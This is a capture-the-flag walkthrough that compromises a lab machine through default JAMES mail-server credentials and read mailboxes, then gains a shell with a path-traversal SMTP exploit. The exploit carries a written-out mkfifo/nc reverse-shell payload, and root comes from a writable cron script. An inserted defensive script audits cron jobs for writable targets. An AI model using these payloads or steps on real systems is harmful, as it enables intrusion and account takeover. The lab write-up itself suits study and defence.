1. Network Discovery

2. Port scan

nmap -Pn -p1000-

3. OS and service scan

4. Vuln scan

5. Starting w/ port 80


Directory scan

Access the site

View page source, nothing


Try XSS, but nothing happened.

Maybe some username?

6. Next one is port 25: JAMES smtpd 2.3.2.

I came across this guide

Username: root
Password: root

I changed all the passwords.

Access these accounts via the POP3 service on port 110 using Thunderbird.

John: there’s a message

Mindy: there are 2 messages.

I have mindy's username and password to log in via SSH.

7. Log in w/ mindy's credentials

cat user.txt

Try exploring system


Read passwd

I'm restricted by rbash and cannot do anything.

8. James 2.3.2: get back to the exploitation guide

Follow the guide

I have to supply the reverse shell command.

Prepare listener on port 443

Connect to port 25

Following the guide and using a reverse shell cheatsheet:

MAIL FROM: <'>
RCPT TO: <../../../../../../../../etc/bash_completion.d>
DATA
From: bla.bla'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 443 >/tmp/f.

Log in w/ mindy again and you will see some weird stuff.

Back to the listener, now I have a shell.

9. Privilege escalation

I need a TTY shell.

I want to run

Prepare SimpleHTTPServer on the attacker machine

Download the script


Change permissions and run

/tmp/ -t

The machine is 32-bit.

There’s /opt/tmp/py -> very interesting

Cannot do anything with these files

Nothing on SUID/SGID

Nothing on cron

Verify sudo

No command

Verify capabilities

Let's check some services besides the cron job.

I found this 'cron -f'. There must be something running in the background.

Observe system w/ pspy

This machine is 32-bit. I will download pspy32 to the machine.

chmod 777 pspy32
/tmp/pspy32

After waiting for the observation I got this. It's that '/opt/'.

Read the file.


I can append this command to the script to get a root shell.
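Added here as a defender's counterpart to the cron finding above, not part of the original writeup: a small audit that flags cron jobs whose command is a script that group or world users could edit. It assumes the system-crontab format with a user field, and the crontab and scripts it runs over are constructed in a temp directory.

```shell
#!/bin/sh
# Added example, not from the original writeup: audit cron jobs whose command
# is a script that non-root users can modify, which is the weakness used
# against the /opt script above. Assumes the system-crontab format with a
# user field ("m h dom mon dow user command"), as in /etc/crontab and
# /etc/cron.d/*; the sample crontab and scripts below are constructed.

# audit_cron_file FILE: print "RISK <user> <target> <mode>" for each job whose
# command is an existing absolute path that is group- or world-writable.
audit_cron_file() {
    # drop comments, blank lines and VAR=value environment settings
    grep -Ev '^[[:space:]]*(#|$)|^[[:space:]]*[A-Za-z_][A-Za-z0-9_]*=' "$1" |
    while read -r _min _hour _dom _mon _dow user cmd; do
        target=${cmd%% *}                 # first token = program or script
        case "$target" in /*) ;; *) continue ;; esac   # skip PATH lookups
        [ -e "$target" ] || continue
        mode=$(ls -ld "$target" | cut -c1-10)   # e.g. -rwxrwxrwx (portable)
        case "$mode" in
            ?????w*|????????w*)           # 'w' at group (6) or other (9)
                printf 'RISK %s %s %s\n' "$user" "$target" "$mode" ;;
        esac
    done
}

# demo: constructed sample in a temp dir, one world-writable job target (the
# shape of the writeup's /opt script) and one locked-down one. The fix for a
# RISK line is chown root:root plus chmod 755 on the target.
demo() {
    d=$(mktemp -d)
    printf '#!/bin/sh\necho backup\n' > "$d/tmp.py";  chmod 777 "$d/tmp.py"
    printf '#!/bin/sh\necho ok\n'     > "$d/safe.sh"; chmod 755 "$d/safe.sh"
    cat > "$d/crontab" <<EOF
# m h dom mon dow user command
SHELL=/bin/sh
*/3 * * * * root $d/tmp.py
0 2 * * * root $d/safe.sh --quiet
EOF
    audit_cron_file "$d/crontab"
    rm -rf "$d"
}

demo
```

Run it as root against /etc/crontab and each file in /etc/cron.d to get the same report for a live host.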


Waiting for a while

ls -la

Now I got /tmp/rootbash

Run it


Now I’m root

Get root.txt

ls -la
cat root.txt